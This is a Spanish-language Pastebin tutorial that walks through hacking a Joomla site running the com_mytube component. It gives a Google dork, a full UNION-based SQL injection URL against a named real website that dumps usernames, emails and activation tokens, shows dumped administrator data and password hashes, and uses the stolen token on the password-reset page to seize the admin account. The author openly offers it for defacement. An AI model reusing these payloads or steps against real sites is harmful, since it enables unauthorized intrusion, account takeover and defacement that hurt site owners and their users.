Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- -----------------------------------------------------------------------------------
- ___________ ====================================
- |.---------.| SEGURIDAD INFORMATICA
- ||no jueges|| YEI ZETA (TUTORIAL)>-Medianfire.es.tl .orionDeep
- ||al mejor ||=======================================================
- ||Operderas||
- |'---------'|
- `)__ ____('
- [=== -- o ]--.
- __'---------'__ \
- [::::::::::: :::] )
- `""'"""""'""""`/T\
- \_/
- -----------------------------------------------------------------------------------
- -Dork
- -Remplazar /Index
- -AtackSQl
- -ResetPassword
- -ConfirmacionTest
- -AdminLogin
- -Administrador /administrador
- -----------------------------------------------------------------------------------
- ATENCION YEI ZETA POST:Todo los tutoriales quedaran en un limite de personas que
- los usen sea para solo publicidad o para un defacement.
- -----------------------------------------------------------------------------------
- Primero que todo hola soy yei zeta seguridad de redes y paginas webs contactame:
- lo que haremos es tratar de confirmar una contraseña con el mismo valor de TEst.
- Comienza.....
- -----------------------------------------------------------------------------------
- Buscamos la siguiente Dork:inurl:"option=com_mytube" en google la cual nos saldra
- unas grandes variedades de paginas escojen una por ejemplo aca tengo la mia.
- http://test.hariomgroup.net/index.php?view=video&id=4164&option=com_m
- http://--> no esta protegida en https por si algo nos costaria.
- test.hariomgroup.net->Test.Vemos que su confirmacion de test es posiblemente accedible.
- index.php?view=video&id=4164&option=com_m tenemos el resto de la extencion de la URL
- principal que tambien es muy pero muy igual al dork que pusimos en google.
- -------------------------------------------------------------------------------------
- lo que haremos es remplasarla.
- Por esta quetenemos aca:
- /index.php?&option=com_mytube&Itemid=88&view=videos&type=member&user_id=62+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,concat%280x3a,username,0x3a,email,0x3a,activation%29,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users+where+id=62--
- -----------------------------------------------------------------------------------
- Nos quedaria haci:
- http://test.hariomgroup.net/index.php?&option=com_mytube&Itemid=88&view=videos&type=member&user_id=62+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,concat%280x3a,username,0x3a,email,0x3a,activation%29,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users+where+id=62--
- -----------------------------------------------------------------------------------
- Added: :Administrator:[email protected]:5a390aef7a5e25fd77004551e122fab4:$1$6a4cb497$
- From: 25
- Views: 8
- ----------------------------------------------------------------------------------------
- ahora los que nos falta es lo siguiente:
- Incluir en nuestra direccion:/index.php?option=com_user&view=reset
- quedaria haci:
- http://test.hariomgroup.net/index.php?option=com_user&view=reset
- nos pide ahora que escribamos el correo electronico pero el que pondremos es el que encontramos cuando explotamos la web:
- [email protected] ->Correo
- ahora nos saldra:
- ACTUALIZACIÓN: Joomla! 1.5.16 ahora hashes restablecer el token
- si usted ve algo así: $ 1 $ 14,411: después del código de activación, que no funcionará
- Si has hecho todo bien, la página se cargará contraseña. Introduzca su contraseña de nuevo .
- -----------------------------------------------------------------------------------
- Seguridad Informatica:Yei zeta contac:[email protected]
- ----------------------------------------------------------------------------------
- Bueno si se les hace mas facil solamente
- Tomamos encuenta esta parte:
- http://test.hariomgroup.net/index.php?&option=com_mytube&Itemid=88&view=videos&type=member&user_id=62+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,concat%280x3a,username,0x3a,email,0x3a,activation%29,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users+where+id=62--
- lo cual seria:
- ContraseñaEncryptada:bf571721b3b59f91ff87153745314ef3:$1$fd8dd059$
- http://test.hariomgroup.net/administrator/
- --------------------------------------------------------------------------------
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement